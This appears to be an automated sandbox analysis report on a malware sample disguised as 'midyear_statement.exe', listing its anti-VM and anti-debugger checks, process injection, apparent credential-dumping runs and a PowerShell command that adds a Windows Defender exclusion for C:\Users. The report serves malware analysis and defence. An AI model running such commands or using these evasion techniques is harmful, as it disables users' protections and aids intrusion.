Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233F7A7 Sleep,ExitProcess,

24_2_1233F7A7

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\svchost.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

27_2_0040DD85

Contains functionality to enumerate running services

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

24_2_1234A748

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5574	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4195	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Window / User API: threadDelayed 9520	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Window / User API: foregroundWindowGot 1755	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\Public\Libraries\wkrriuhD.pif

API coverage: 9.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 5574 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 4195 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928	Thread sleep count: 143 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928	Thread sleep time: -429000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924	Thread sleep count: 139 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924	Thread sleep time: -69500s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928	Thread sleep count: 9520 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928	Thread sleep time: -28560000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_040A5878
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	24_2_00401612
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	24_2_0040128D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_12339253
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	24_2_1234C291
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	24_2_1233C34D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_12339665
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_12349AF5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233783C FindFirstFileW,FindNextFileW,	24_2_1233783C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	24_2_1233880C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1237E879 FindFirstFileExA,	24_2_1237E879
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_1233BD37
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	24_2_146410F1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14646580 FindFirstFileExA,	24_2_14646580
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,	27_2_0040AE51
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	28_2_00407EF8

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

24_2_12337C97

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 27_2_00418981 memset,GetSystemInfo,

27_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2080000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.000000000077B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: svchost.exe, 00000009.00000002.3646615871.0000026BC202B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000085C000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124E0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382585003.00000000124E5000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.3644458412.0000026BC2002000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: bhv348F.tmp.27.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj
Source: svchost.exe, 00000009.00000002.3647045184.0000026BC208D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000`
Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{#s
Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_
Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\midyear_statement.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wkrriuhD.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wkrriuhD.pif	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

24_2_1236BB22

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

27_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_040B7A50

Contains functionality to read the PEB

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_0059113F mov eax, dword ptr fs:[00000030h]	24_2_0059113F
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_0059113F mov eax, dword ptr fs:[00000030h]	24_2_0059113F
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_005D4097 mov eax, dword ptr fs:[00000030h]	24_2_005D4097
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123732B5 mov eax, dword ptr fs:[00000030h]	24_2_123732B5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14644AB4 mov eax, dword ptr fs:[00000030h]	24_2_14644AB4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12341CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

24_2_12341CFE

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process token adjusted: Debug

Source: C:\Windows \System32\2506803.exe	Code function: 16_2_613C21C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_613C21C0
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_1236BB22
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12364B47 SetUnhandledExceptionFilter,	24_2_12364B47
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123649F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_123649F9
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12364FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_12364FDC
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14642639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_14642639
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_146460E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_146460E2
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14642B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_14642B1C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\midyear_statement.exe	Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Memory allocated: C:\Users\Public\Libraries\wkrriuhD.pif base: 590000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\Public\Libraries\wkrriuhD.pif

24_2_123480EF

Maps a DLL or memory area into another process

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Section loaded: NULL target: C:\Users\Public\Libraries\wkrriuhD.pif protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\midyear_statement.exe	Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 293008	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 2C2008
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Memory written: C:\Users\Public\Libraries\wkrriuhD.pif base: 3B2008

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

24_2_123420F7

Contains functionality to simulate mouse events

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12349627 mouse_event,

24_2_12349627

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\midyear_statement.exe	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"	Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif

Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP5\0
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager"
Source: wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager573ef12
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerP5\
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerk
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: wkrriuhD.pif, 00000018.00000002.3664577079.00000000124D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr
